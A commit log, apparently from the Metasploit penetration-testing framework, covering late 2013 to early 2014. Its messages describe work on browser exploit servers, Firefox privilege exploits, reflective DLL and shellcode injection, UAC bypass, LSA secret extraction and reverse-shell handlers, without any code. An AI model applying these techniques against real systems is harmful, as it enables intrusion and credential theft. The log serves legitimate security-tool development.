Meatballs
398e8463b1
Add more informative errors
2014-01-23 23:19:00 +00:00
Tod Beardsley
b5f61024c5
Land #2907 , fixes qual asset importer
...
Addresses MSP-9311
2014-01-23 13:32:22 -06:00
jvazquez-r7
256f2b12eb
Land #2894 , @wchen-r7's CheckCode documentation update
2014-01-23 07:31:24 -06:00
lsanchez-r7
58cf7193f9
fixing NameError undefined local variable in an import
2014-01-22 16:54:31 -06:00
Meatballs
9acd0f4b56
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2014-01-22 21:46:50 +00:00
Tod Beardsley
90207628cc
Land #2666 , SSLCompression option
...
[SeeRM #823 ], where Stephen was asking for SSL compression for
Meterpreter -- this isn't that, but it's at least now possible for other
Metasploit functionality.
2014-01-22 10:42:13 -06:00
Meatballs
80452767c8
Comments
2014-01-22 10:24:24 +00:00
Meatballs
156e3c046e
Dont lookup twice
2014-01-22 10:14:56 +00:00
Meatballs
6d6d1e1033
No need to fiddle with naming context
2014-01-22 10:06:36 +00:00
Tod Beardsley
0b6e03df75
More comment docs on SSLCompression
2014-01-21 16:48:26 -06:00
Tod Beardsley
b8219e3e91
Warn the user about SSLCompression
2014-01-21 16:41:45 -06:00
Meatballs
720f892e2f
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2014-01-21 21:00:51 +00:00
sinn3r
ea47da5682
Add wiki link "How to write a check() method" to documentation
2014-01-20 20:10:50 -06:00
sinn3r
e48b8ae14c
Use a better term
2014-01-19 16:01:38 -06:00
sinn3r
afd0e71457
Use the term "exploit" is a little more correctly
...
So Metasploit uses the term "exploit" to describe something, a module
or an action, that results popping a shell. A check normally doesn't
pop a shell, so avoid that language.
2014-01-17 13:50:23 -06:00
sinn3r
363c53e14e
Clearify when to use a specific CheckCode
...
An example of the biggest confusion module developers face is not
actually knowing the difference between Detected vs Appears vs
Vulnerable. For example: a module might flag something as a
vulnerable by simply doing a banner check, but this is often
unreliable because either 1) that banner can be fooled, or 2)
the patch does not actually update the banner. More reasons may
apply. Just because the banner LOOKS vulnearble doesn't mean it is.
2014-01-17 13:35:17 -06:00
HD Moore
68ccdc8386
Fix a stack trace when module_payloads.rb is run
...
This fixes a missing check for self.target being nil in the compatible_payloads method
2014-01-13 15:36:33 -08:00
William Vu
4ccf1a4720
Land #2873 , Msf::Handler::ReverseHttp::UriChecksum
2014-01-13 15:38:56 -06:00
David Maloney
41807d7e4e
move rev_http uri checksum code
...
need access to the uri checksum
routines outside of the handler.
moved them to their own mixin
and then mixed into the handler.
added specs also
2014-01-13 15:18:16 -06:00
Tod Beardsley
e6e6d7aae4
Land #2868 , fix Firefox mixin requires
2014-01-13 14:23:51 -06:00
Joe Vennix
3db143c452
Remove explicit requires for FF payload.
...
Adds ff payload require to msf/core/payload.rb
2014-01-13 13:07:55 -06:00
jvazquez-r7
95a5d12345
Merge #2835 , #2836 , #2837 , #2838 , #2839 , #2840 , #2841 , #2842 into one branch
2014-01-13 10:57:09 -06:00
sinn3r
cacd7ff9d4
Land #2827 - Add firefox js xpcom payloads for universal ff shells
2014-01-10 14:29:32 -06:00
Joe Vennix
7af8fe9cd1
Catch exceptions in an XSS script and return the error.
2014-01-07 16:23:24 -06:00
Joe Vennix
fb1a038024
Update async API to actually be async in all cases.
...
This avoids zalgo. Also optionally checks the return value
of the compiled Function in XSS to allow you to use send()
or an explicit return, which is maybe more natural for
synchronous xss payloads.
2014-01-07 16:17:34 -06:00
Niel Nielsen
73e359ede1
Update reverse_tcp.rb
...
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:06:11 +01:00
Niel Nielsen
e3a3b560e2
Update bind_tcp.rb
...
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:02:52 +01:00
Meatballs
3bf728da61
Dont store in DB by default
2014-01-07 12:20:44 +00:00
Joe Vennix
9d3b86ecf4
Add explicit require for JSON, so msfpayload runs.
2014-01-05 14:58:18 -06:00
Joe Vennix
d00acccd4f
Remove Java target, since it no longer works.
2014-01-04 21:22:47 -06:00
OJ
8898486820
Change display message to show actual bind address
...
When running a http/https listener the address:port that was being
shown in the output was that which was passed to the victim as part
of the stager and not the actual listener address:port.
This commit fixes this so that the display is correct.
2014-01-05 11:28:51 +10:00
Joe Vennix
f2f68a61aa
Use shell primitives instead of resorting to
...
echo hacks.
2014-01-04 19:00:36 -06:00
Raphael Mudge
6034c26fa7
Honor LPORT as callback port for HTTP/S handler
...
This commit completes our quest to (optionally) decouple the stage's
callback parameters from the interface/port our handler binds to.
LPORT is now patched into the stage over ReverseListenerBindPort.
2014-01-04 18:52:19 -05:00
Raphael Mudge
3c9d684759
Cleanup - Remove bind_address from reverse_http.rb
...
This commit removes the now unused bind_address function from
reverse_http.rb. This function returns an array of hosts the handler
should attempt to bind to (e.g., [LHOST value, any])
Other handlers (e.g., reverse_tcp.rb) loop through these values until
they're able to start a server with that bind address.
The HTTP server doesn't work this way. It's setup to try one address
and that's it. It makes sense to have the HTTP server always bind to
0.0.0.0 by default as future modules run by the user may register
resources with the same HTTP server.
2014-01-04 16:02:32 -05:00
Raphael Mudge
6f55579acd
HTTP Handler Bind to 0.0.0.0 or ReverseListenerBindAddress
...
This commit returns the HTTP/S handler to its former semantic glory.
By default the HTTP/S handler will bind to :: or 0.0.0.0. If the
user specifies a ReverseListenerBindAddress then, instead, the
server will bind to that address.
The previous commit to change the URL to always reference LHOST
should go with this too. LHOST is always my intent of where the
stage should call home too. ReverseListenerBindAddress would make
sense as my intent as to where I want to bind to. The two options
shouldn't take on each other's meanings.
2014-01-04 15:50:06 -05:00
Raphael Mudge
f93210ca74
Always Use LHOST for Full URL in HTTP/S Stage
...
Redmine #8726 documents a change where the reverse HTTP/S
tries to bind LHOST and if it can not it does a hard stop
If it's expected that users will use ReverseListenerBind-
-Address then this commit addresses #8726 by patching the
HTTP/S stage with the host provided by the user in LHOST.
Currently ReverseListenerBindAddress (if used) is patched
into the stage. This makes for a broken HTTP/S session if
the user sets this option to 0.0.0.0.
With this commit--users can provide any LHOST they like
and set ReverseListenerBindAddress to 0.0.0.0 and things
will work.
This commit does not attempt to bring the HTTP/S handler
back to the old behavior of falling back to 0.0.0.0 when
it can't bind LHOST. I'd welcome the old behavior but I
leave it to you to decide what makes sense. :)
2014-01-04 15:16:22 -05:00
Joe Vennix
b9c46cde47
Refactor runCmd, allow js exec.
...
* Updates exec payload to not touch disk
* Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options)
2014-01-04 08:46:57 -06:00
Joe Vennix
60991b08eb
Whitespace tweak.
2014-01-03 18:40:31 -06:00
Joe Vennix
a5ebdce262
Add exec payload. Cleans up a lot of code.
...
Adds some yardocs and whatnot.
2014-01-03 18:23:48 -06:00
Joe Vennix
8fd517f9ef
Fixes shell escaping errors with nested quotes in windows.
2014-01-03 16:14:28 -06:00
Joe Vennix
13464d0aae
Minor cleanup of firefox.rb.
2014-01-03 01:34:57 -06:00
Joe Vennix
7961b3eecd
Rework windows shell to use wscript.
2014-01-03 01:29:34 -06:00
Meatballs
5606958320
Resolve require order
2014-01-02 23:46:18 +00:00
jvazquez-r7
f5f18965b9
Move the require to the payloads as ruby and nodejs payloads do
2014-01-02 16:05:03 -06:00
jvazquez-r7
764d0822f6
Use the current msf's naming convention
2014-01-02 15:57:09 -06:00
Joe Vennix
06fb2139b0
Digging around to get shell_command_token to work.
2014-01-02 14:05:06 -06:00
Joe Vennix
8d3130b19e
Reorder targets.
2014-01-02 10:48:28 -06:00
Joe Vennix
9b39ea55ee
Fix comment.{
2014-01-02 10:48:28 -06:00
Joe Vennix
1f9ac12dda
DRYs up firefox payloads.
2014-01-02 10:48:28 -06:00
Joe Vennix
694cb11025
Add firefox platform, architecture, and payload.
...
* Enables chrome privilege exploits in firefox to run a javascript cmd
shell session without touching the disk.
* Adds a spec for the addon_generator.
2014-01-02 10:48:28 -06:00
jvazquez-r7
0725b9c69c
Refactor JSP payloads
2013-12-31 08:27:37 -06:00
Samuel Huckins
985af3adfe
Update to masked credential format
...
* To support change in Pro export format. Previous format looked
like an XML element, for no reason, failed validation.
2013-12-30 10:59:15 -06:00
jvazquez-r7
39844e90c3
Don't user merge! because can modify self.compat
2013-12-27 16:37:34 -06:00
sinn3r
9c484dd0a3
Land #2786 - HP SiteScope issueSiebelCmd Remote Code Execution
2013-12-23 02:34:01 -06:00
jvazquez-r7
ed838d73a6
Allow targets to specify Compat[ible] payloads
2013-12-19 17:48:15 -06:00
Joe Vennix
ca23b32161
Add support for Procs in browserexploit requirements.
2013-12-19 12:49:05 -06:00
Meatballs
62ef810e7c
Use Extapi if available
2013-12-19 18:18:47 +00:00
Meatballs
737154c2fe
Update to use extapi
2013-12-19 16:46:09 +00:00
Meatballs
3ef1c0ecd6
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2013-12-19 14:25:07 +00:00
Meatballs
6e43edff4c
Merge in extapi post mixin
2013-12-19 14:25:02 +00:00
Meatballs
244cf3b3f6
Merge remote-tracking branch 'upstream/pr/2736' into enum_ad_perf
2013-12-19 13:59:57 +00:00
Joe Vennix
cb390bee7d
Move comment.
2013-12-18 20:37:33 -06:00
Joe Vennix
f411313505
Tidy whitespace.
2013-12-18 20:31:31 -06:00
Joe Vennix
9ff82b5422
Move datastore options to mixin.
2013-12-18 14:52:41 -06:00
Joe Vennix
64273fe41d
Move addon datastore options into mixin.
2013-12-18 14:42:01 -06:00
Joe Vennix
1235615f5f
Add firefox 15 chrome privilege exploit.
...
* Moves the logic for generating a firefox addon into its own mixin
* Updates the firefox_xpi_bootstrapped_addon module to use the mixin
* Module only works if you move your mouse 1px in any direction.
2013-12-18 14:30:35 -06:00
Meatballs
3e54379b0e
Merge remote-tracking branch 'upstream/master' into wmic_post
...
Conflicts:
lib/msf/core/post/windows.rb
2013-12-18 13:40:54 +00:00
Meatballs
687cbe5f60
Shadowcopy should use common wmic command
...
Small fix to ensure output is retrieved (args -> nil)
Modify shadowcopy to use wmic_query
2013-12-18 13:34:50 +00:00
William Vu
252909a609
Land #2448 , @OJ's ReverseListenerBindPort :)
2013-12-17 11:24:09 -06:00
Meatballs
6ee1a9c6e1
Fix duplicate error
2013-12-17 00:11:37 +00:00
Meatballs
06b399ee30
Remove ERROR_
...
To access as Error::NO_ACCESS
2013-12-16 19:52:11 +00:00
Meatballs
08a44fdfb7
Filename match module
2013-12-16 19:48:17 +00:00
Meatballs
57f2027e51
Move to module
2013-12-16 19:45:52 +00:00
Meatballs
c9084bd2d5
Remove errant fullstops
2013-12-16 18:53:37 +00:00
Meatballs
75c87faaf8
Add Windows Error Codes to Windows Post Mixin
2013-12-16 18:50:18 +00:00
Meatballs
435cc9b93f
Add single quote encapsulation
...
For WMI and psh_web_delivery
2013-12-16 15:13:13 +00:00
Meatballs
b252e7873b
Merge remote-tracking branch 'upstream/master' into pr2075
2013-12-16 14:29:05 +00:00
Meatballs
819ba30a33
msftidy
...
Conflicts:
lib/msf/core/post/windows/services.rb
2013-12-15 01:12:46 +00:00
Meatballs
a930056d7f
Added service status checks to Post::Windows::Services
...
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
Conflicts:
lib/msf/core/post/windows/services.rb
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
2013-12-15 01:12:45 +00:00
Meatballs
284a45a6c5
Convert UTF16 to ASCII
2013-12-14 22:58:16 +00:00
Meatballs
e46b5c9d55
Revert to file io if no EXTAPI
2013-12-14 22:46:22 +00:00
Meatballs
ca5ee7e156
Load extapi before wmic
2013-12-14 22:45:56 +00:00
Meatballs
b532987b8f
Re-add file out to wmic_command
2013-12-14 20:58:33 +00:00
Meatballs
8d5f298d3d
Clear clipboard first
2013-12-14 20:26:46 +00:00
Meatballs
7902f061ca
Final tidyup
2013-12-14 20:18:14 +00:00
Meatballs
04496a539c
Fix up local wmi exploit.
2013-12-14 20:05:51 +00:00
Meatballs
4224c016f4
Use WaitForSingleObject instead of loop
2013-12-14 18:42:31 +00:00
Meatballs
12afdd2cbb
Get and parse result from clipboard
2013-12-14 18:30:43 +00:00
Meatballs
3ad1e57f8d
Merge remote-tracking branch 'upstream/master' into wmic_post
2013-12-14 16:25:31 +00:00
jvazquez-r7
83e448f4ae
Restore vprint_error message
2013-12-12 09:06:29 -06:00
jvazquez-r7
5c1ca97e21
Create a new process to host the final payload
2013-12-12 08:26:44 -06:00
William Vu
ff9cb481fb
Land #2464 , fixes for llmnr_response and friends
...
Fixed conflict in lib/msf/core/exploit/http/server.rb.
2013-12-10 13:41:45 -06:00
scriptjunkie
77e9996501
Mitigate metasm relocation error by disabling ASLR
...
Deal with import error by actually using the GetProcAddress code.
2013-12-07 20:54:13 -06:00
scriptjunkie
8d33138489
Support silent shellcode injection into DLLs
...
Only run code on DLL_PROCESS_ATTACH, preventing infinite loop otherwise:
Added code would create thread -> calls DLL entry point -> calling added code...
2013-12-07 19:44:17 -06:00
Meatballs
3aebe968bb
Land #2721 Reflective DLL Mixin
...
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.
Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
2013-12-06 12:26:51 +00:00
OJ
155836ddf9
Adjusted style as per egypt's points
2013-12-06 10:08:38 +10:00
OJ
ccbf305de1
Remove exception stuff from the payloads
2013-12-06 09:26:46 +10:00
OJ
5a0a2217dc
Add exception if DLL isn't RDI enabled
2013-12-06 09:18:08 +10:00
OJ
2cb991cace
Shuffle RDI stuff into more appropriate structure
...
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
2013-12-06 08:25:24 +10:00
OJ
fb84d7e7fe
Update to yardoc conventions
2013-12-06 07:54:25 +10:00
sinn3r
c7bb80c1d7
Add wvu as an author to author.rb
2013-12-05 00:33:07 -06:00
OJ
b936831125
Renamed the mixin module
2013-12-05 08:13:54 +10:00
OJ
7b24f815ee
Missed a single module in rename
2013-12-04 22:54:07 +10:00
OJ
7e8db8662e
Update name of the mixin
...
Changed `RdiMixin` to `ReflectiveDLLInjection`.
2013-12-04 22:18:29 +10:00
OJ
f79af4c30e
Add RDI mixin module
...
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.
This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
2013-12-04 16:09:41 +10:00
yehualiu
8254c0bae2
this site is down
2013-12-01 14:26:03 +08:00
William Vu
77b036ce5d
Land #2703 , uninit const fix for MSSQL_SQLI
2013-11-27 13:50:48 -06:00
jvazquez-r7
a5aca618e2
fix fail_with usage on Exploit::Remote::MSSQL_SQLI
2013-11-27 11:33:19 -06:00
jvazquez-r7
a32c9e5efc
Fix fail_with on Exploit::Remote::HttpClient
2013-11-27 11:19:46 -06:00
sinn3r
5d10b44430
Add support for Silverlight
...
Add support for Silverlight exploitation. [SeeRM #8705 ]
2013-11-26 14:47:27 -06:00
Meatballs
b015dd4f1c
Land #2532 Enum LSA Secrets
...
With refactoring of common methods from smart_hashdump, hashdump,
cachedump to Windows::Post::Privs
2013-11-24 18:09:33 +00:00
Meatballs
a3c7dccfc0
Add disconnect option to psexec
...
Allow the module to prevent the mixin from ending the SMB session.
2013-11-24 16:37:25 +00:00
Meatballs
dd9bb459bf
PSEXEC Refactor
...
Move peer into mixin
PSEXEC should use the psexec mixin
2013-11-24 16:24:05 +00:00
Meatballs
c03c33f6f6
Initial commit
2013-11-24 14:58:18 +00:00
Meatballs
e7dfda00db
Documentation
2013-11-23 22:03:43 +00:00
Meatballs
becc521406
Constants, yey
2013-11-23 21:46:11 +00:00
Meatballs
699d13eef1
Share the wealth
...
Move LDAP methods to a Post mixin.
2013-11-23 21:42:09 +00:00
Meatballs
6c83109422
Really fix wmi
2013-11-23 16:44:44 +00:00
William Vu
8e23119e17
Land #2678 , DB_ALL_CREDS should default to false
2013-11-22 23:42:00 -06:00
Tod Beardsley
8fc0a8199e
DB_ALL_CREDS should be disabled by default
...
[SeeRM #8699 ]
2013-11-22 22:16:40 -06:00
Meatballs
259d5a2dba
Backout Set-Variable as it is 3.0 only
2013-11-23 01:15:13 +00:00
Meatballs
1c60373f68
Reinstate %COMSPEC%
2013-11-23 00:45:04 +00:00
Meatballs
c194fdc67e
Fixup WMI
...
-c doesn't like $var assignments
2013-11-23 00:31:11 +00:00
Meatballs
3cbf768d16
Small size reductions
2013-11-22 22:58:42 +00:00
Meatballs
20b76602a1
Merge remote-tracking branch 'upstream/master' into pr2075
...
Conflicts:
lib/msf/core/exploit/powershell.rb
2013-11-22 22:41:08 +00:00
Tod Beardsley
e88da09894
Land #2660 , DLL/service creation for x64
2013-11-20 17:25:16 -06:00
Joe Vennix
739c7b4ca2
More dead code and tweaks.
2013-11-20 14:44:53 -06:00
Joe Vennix
3ff9da5643
Remove compression options from client sockets.
...
I couldn't verify that it was working, as it always sends 1 compression type of NULL.
2013-11-20 14:41:45 -06:00
Meatballs
3ed84d1e0b
Remove puts
2013-11-20 20:29:54 +00:00
Meatballs
7253cc73d5
:payload_instance
2013-11-20 20:28:00 +00:00
Meatballs
f27194a8ce
Always default to payload options
2013-11-20 20:14:59 +00:00
Meatballs
135dad1f4e
Fix dll/service creation
2013-11-20 20:10:47 +00:00
jvazquez-r7
110e78a1ad
Land #2507 , @todb-r7's fix to allow DCERPC misin to use RPORT
2013-11-20 10:21:32 -06:00
Joe Vennix
f8b57d45cd
Reenable the client SSLCompression advanced option.
...
Add spec for some of the additions to Rex::Proto::Http::Client
2013-11-20 01:03:13 -06:00
Joe Vennix
109fc5a834
Add SSLCompression datastore option.
...
Also disables the compression by default. TLS-level compression is almost
never used by browsers, and openssl seems to be the only one that enables
it by default.
This also kills some ruby < 1.9.3 code.
2013-11-19 22:34:39 -06:00
Tod Beardsley
ac1fb2d1da
Just use a straight RPORT, don't sneak 593.
...
Incidentally, the endmap scanner doesn't appear to work at all for
http-rpc-epmap, so no harm done anyway (tested against Windows 2008
server).
It looks like a bigger change than it realy is, thanks to the indentaton
changes by removing the itertor. Diff this without whitespace changes to
get a better idea of what's actually different.
2013-11-19 13:29:02 -06:00
jvazquez-r7
f690667294
Land #2617 , @FireFart's mixin and login bruteforcer for TYPO3
2013-11-18 13:37:16 -06:00
James Lee
0aef145f64
Merge remote-tracking branch 'upstream/master' into land-2532-enum-lsa
2013-11-13 18:11:21 -06:00
James Lee
8471f74b75
Refactor ivar to a more reasonable method
...
Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
2013-11-13 18:09:41 -06:00
James Lee
16627c1bd3
Add spec for capture_lsa_key
2013-11-13 15:16:34 -06:00
William Vu
6bd82d8589
Land #2636 , Win8 for {constants,platform}.rb
2013-11-13 14:20:52 -06:00
sinn3r
3a923422a3
Update class for Win 8
2013-11-13 13:27:44 -06:00
James Lee
3168359a82
Refactor lsa and add a spec for its crypto methods
2013-11-13 11:55:39 -06:00
Tod Beardsley
74df9bd037
Bump version number since 4.8.0 is out
2013-11-13 11:42:31 -06:00
sinn3r
8e90116c89
Add Win 8 to constants
2013-11-13 11:38:27 -06:00
jvazquez-r7
ef6d9db48f
Land #2613 , @wchen-r7's BrowserExploitServer mixin
2013-11-12 17:33:12 -06:00
sinn3r
fbe1b92c8f
Good bye get_resource
2013-11-12 17:25:55 -06:00
Tod Beardsley
2035983d3c
Fix a handful of msftidy warnings, and XXX SSL
...
Marked the SSL stuff as something that needs to be resolved in order to
fix a future bug in datastore manipulation. Also, fixed some whitespace
and exec complaints
[SeeRM #8498 ]
2013-11-11 21:23:35 -06:00
sinn3r
cf8f2940b0
Oops, this is the right filename
2013-11-11 15:45:11 -06:00
sinn3r
85150823cd
rename again
2013-11-11 15:44:27 -06:00
sinn3r
6a840fc169
Move file to get a matching name
2013-11-11 12:41:03 -06:00
OJ
063da8a22e
Update reverse_https_proxy stager/handler
...
This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00
sinn3r
866f240337
A little update on documentation
2013-11-07 17:06:43 -06:00
sinn3r
32b12609bd
Forgot to pass optional headers
2013-11-07 16:50:58 -06:00
FireFart
bdd33d4daf
implement feedback from @jlee-r7
2013-11-07 23:07:58 +01:00
FireFart
aab4d4ae76
first commit for typo3
2013-11-07 22:38:27 +01:00
sinn3r
991240a87e
Support java version detection
2013-11-07 00:54:52 -06:00
sinn3r
3e1771aa77
Being able to pass binding when we need to
2013-11-07 00:12:29 -06:00
sinn3r
23996ec32c
Fix up some things
2013-11-06 22:47:02 -06:00
sinn3r
c338f7a8c0
Change how requirements are defined, rspec, etc
2013-11-06 14:01:29 -06:00
sinn3r
c92116060e
Forgot to rm this line
2013-11-06 01:53:46 -06:00
sinn3r
f2e4d5507c
More rspec
2013-11-06 01:45:40 -06:00
sinn3r
636adc81de
Add rop_junk and rop_nop
2013-11-06 01:04:33 -06:00
sinn3r
65c96a1f45
Allow the module to be target specific
2013-11-06 00:57:53 -06:00
sinn3r
63d3c7e8bb
Put proxy headers in a constant
2013-11-05 16:33:36 -06:00
sinn3r
73701462ed
Fix ActiveX. Use ERB for Javascript detection code.
2013-11-05 16:26:41 -06:00
James Lee
36f96d343e
Revert "Revert "Land #2505" to resolve new rspec fails"
...
This reverts commit e7d3206dc9
.
2013-11-05 13:45:00 -06:00
sinn3r
9c6b187cc6
stuff
2013-11-05 11:05:33 -06:00
sinn3r
0513dad789
-_-
2013-11-05 10:30:37 -06:00
sinn3r
9d1742ac47
Fix typos
2013-11-05 10:15:53 -06:00
sinn3r
8fb2b943be
Add ActiveX detection
2013-11-05 01:34:56 -06:00
sinn3r
5f2d8358c0
Be more browser specific with Javascript generation
2013-11-05 01:04:52 -06:00
sinn3r
844daf0e00
No regex for get_resource checking
2013-11-04 17:49:43 -06:00
sinn3r
054a525f35
Change profile data structure
2013-11-04 17:46:36 -06:00
sinn3r
ef57a38274
Move documentation about profile structure
2013-11-04 16:47:15 -06:00
OJ
12810580d6
Remove arg for bind port/addr functions
...
Done to avoid masking of datastore instance variable.
2013-11-05 06:56:21 +10:00
sinn3r
9c8ecd2ede
Fix encoding order
2013-11-04 14:06:42 -06:00
sinn3r
d970925cbf
Fix encoding bug
2013-11-04 13:45:29 -06:00
sinn3r
23e5a9f048
Force on_request_exploit override
2013-11-04 12:54:52 -06:00
sinn3r
e83f4e5120
Use a warning
2013-11-04 12:54:41 -06:00
sinn3r
25787fbaa7
Change has_proxy?
2013-11-04 12:52:15 -06:00
sinn3r
c6fb570480
Correct bad method naming
2013-11-04 12:35:04 -06:00
sinn3r
016e686bcf
super chomp
2013-11-04 12:28:22 -06:00
sinn3r
c3d9f4064c
They are symbols not strings
2013-11-04 12:10:39 -06:00
sinn3r
0337e6ff54
Do yard documentation
2013-11-04 12:09:59 -06:00
sinn3r
abc06aa8aa
Use mutex
2013-11-01 11:35:23 -05:00
sinn3r
5fb261a974
Change var name
2013-10-31 23:48:41 -05:00
sinn3r
d54c8a359b
Fix bug in proxy detection
2013-10-31 23:42:43 -05:00
sinn3r
7a33c48a0f
No double slash
2013-10-31 23:17:38 -05:00
sinn3r
5851d502b5
Rename some stuff
2013-10-31 23:12:20 -05:00
sinn3r
21891a8337
Make sure the browser can't retry by going to the first URL
2013-10-31 23:08:17 -05:00
sinn3r
94d62613ab
Pretty much done with these, remove these comments.
2013-10-31 19:04:11 -05:00
sinn3r
828ef9c64c
Adds target-specific payload generator
2013-10-31 18:54:01 -05:00
sinn3r
8a0ebcbac7
Adds method get_module_resource
2013-10-31 14:34:38 -05:00
sinn3r
10fd892827
Fix a "undefined method to_sym" bug
...
If something is undetectable, the value may be empty, which triggers
a undefined method error because the regex always assumes there is
something. So instead of +, we use *.
2013-10-31 14:06:05 -05:00
sinn3r
6e7e5a0ff9
Put postInfo() in the js directory
2013-10-31 13:55:22 -05:00
sinn3r
00efad5c5d
Initial commit for BrowserExploitServer mixin
2013-10-31 13:17:06 -05:00
William Vu
f5d1d8eace
chmod -x .rb files without #! in modules and lib
...
It wasn't just cmdstager_printf.rb. :/
2013-10-30 19:51:25 -05:00
William Vu
333a0d5820
chmod -x cmdstager_printf.rb
2013-10-28 18:47:14 -05:00
b00stfr3ak
a476595ddb
Added require to post/windows
2013-10-25 14:42:22 -07:00
b00stfr3ak
84999115d7
Added PSH option if UAC is turned off
...
This will give the option to drop an exe or use psh if uac is turned
off. The lib can be used for post exploitation to drop an exe or use
powershell and then execute it with the runas command. I have used the
lib for both bypassuac and ask.
2013-10-25 14:37:12 -07:00
Tod Beardsley
b5f26455a3
Land #2545 , javascript library overhaul
2013-10-23 16:12:49 -05:00
sinn3r
caf41f34bf
Land #2562 - Fix RM 8510 (FileDropper)
2013-10-22 21:45:33 -05:00
sinn3r
acc73dd545
Land #2282 - BypassUAC now checks if the process is LowIntegrityLevel
2013-10-22 17:16:26 -05:00
jvazquez-r7
7d1dc3746f
Use the @schierlm's command
2013-10-22 16:19:49 -05:00
Tod Beardsley
dc0d9ae21d
Land #2560 , ZDI references
...
[FixRM #8513 ]
2013-10-22 15:58:21 -05:00
Meatballs
8611a2a24c
Merge remote-tracking branch 'upstream/master' into low_integ_bypassuac
2013-10-22 21:42:36 +01:00
sinn3r
ba1edc6fa8
Land #2402 - Windows Management Instrumentation Local -> Peers
2013-10-22 15:39:32 -05:00
jvazquez-r7
4ad9bc5efe
Try to [FixRM #8510 ]
2013-10-22 08:42:14 -05:00
sinn3r
afcce8a511
Merge osdetect and addonsdetect
2013-10-22 01:11:11 -05:00
sinn3r
99d5da1f03
We can simplify this
2013-10-21 20:22:45 -05:00
sinn3r
9a3e719233
Rework the naming style
2013-10-21 20:16:37 -05:00
Meatballs
4fc8bb2b4b
Auto arch detection
2013-10-22 00:42:59 +01:00
William Vu
9258d79978
Add ZDI references to reference.rb
2013-10-21 15:13:46 -05:00
sinn3r
032da9be10
Land #2426 - make use of Msf::Config.data_directory
2013-10-21 13:07:33 -05:00
Tod Beardsley
e7d3206dc9
Revert "Land #2505" to resolve new rspec fails
...
This reverts commit 717dfefead
, reversing
changes made to 6430fa3354
.
2013-10-21 12:47:57 -05:00
William Vu
717dfefead
Land #2505 , missing source fix for sock_sendpage
2013-10-21 11:47:55 -05:00
sinn3r
8a94df7dcd
Change category name for base64
2013-10-18 21:20:16 -05:00
Tod Beardsley
ffcb86eba2
Land #2541 , Outpost24 importer
...
Sample data is currently secret. If we get a hold of non-secret sample
data, it'll be tacked on to the Redmine bug referenced below.
[FixRM #8384 ]
2013-10-18 13:21:58 -05:00
Meatballs
4e4d0488ae
Rubyfy constants in privs lib
2013-10-18 18:26:07 +01:00
sinn3r
6f04a5d4d7
Cache Javascript
2013-10-18 12:23:58 -05:00
sinn3r
b0d614bc6a
Cleaning up requires
2013-10-18 01:47:27 -05:00
Meatballs
e450e34c7e
Merge branch 'master' of github.com:rapid7/metasploit-framework into low_integ_bypassuac
...
Conflicts:
modules/exploits/windows/local/bypassuac.rb
2013-10-17 23:35:36 +01:00
Meatballs
5a662defac
Post::Privs uses Post::Registry methods
2013-10-17 23:28:07 +01:00
sinn3r
c926fa710b
Move all exploitation-related JavaScript to their new home
2013-10-17 16:43:29 -05:00
Rob Fuller
8f2ba68934
move decrypt_lsa and decrypt_secret to priv too
2013-10-17 00:04:21 -04:00
Rob Fuller
541d932d77
move decrypt_lsa to priv as well
2013-10-16 23:53:33 -04:00
Rob Fuller
60d8ee1434
move capture_lsa_key to priv
2013-10-16 23:45:28 -04:00
Rob Fuller
1a9fcf2cbb
move convert_des_56_to_64 to priv
2013-10-16 23:39:07 -04:00
Rob Fuller
1a85bd22a8
move capture_boot_key to post win priv
2013-10-16 22:46:15 -04:00
sinn3r
4c91f2e0f5
Add detection code MS Office
...
Add detection code for MS Office XP, 2003, 2007, 2010, and 2012.
[SeeRM #8413 ]
2013-10-15 16:27:23 -05:00
William Vu
38965f91ee
Add Outpost24 importer code to core/db.rb
2013-10-15 15:32:28 -05:00
James Lee
676f12e50e
Import the new plaintext export format
...
Also:
* Import John the Ripper's plaintext from cracked NTLM hashes in the
same way
* Don't choke on : in passwords when reading JtR's output
* Fix some whitespace
* Show a count of inactive creds if there are any instead of acting like
they don't exist
2013-10-15 15:12:18 -05:00
William Vu
35dd94f0ac
Land #2518 , uninitialized JavascriptOSDetect fix
2013-10-14 13:32:04 -05:00
sinn3r
e10dbf8a5d
Land #2508 - Add nodejs payloads
2013-10-14 12:23:31 -05:00
sinn3r
da3081e1c8
[FixRM 8482] Fix uninit constant Rex::Exploitation::JavascriptOSDetect
...
This fixes an uninit constant Rex::Exploitation::JavascriptOSDetect
while using a module with js_os_detect. It was originally reported
by Metasploit user @viniciuskmax
[FixRM 8482]
2013-10-14 11:40:46 -05:00
James Lee
60f5567511
Output plaintext creds in a way john can use them
2013-10-13 13:36:03 -05:00
joev
c7bcc97dff
Add SSL support to #nodejs_reverse_tcp.
2013-10-12 03:32:52 -05:00
joev
6440a26f04
Move shared Node.js payload logic to mixin.
...
- this fixes the recursive loading issue when creating a payload
inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
Tod Beardsley
4d76e8e9ac
Add RPORT to the list of DCERPC ports to check
...
[FixRM #8479 ]
2013-10-11 16:23:38 -05:00
Meatballs
9ca9b4ab29
Merge branch 'master' into data_dir
...
Conflicts:
lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
Tod Beardsley
4f1e71e222
Also this isn't Lua. Deal with commas.
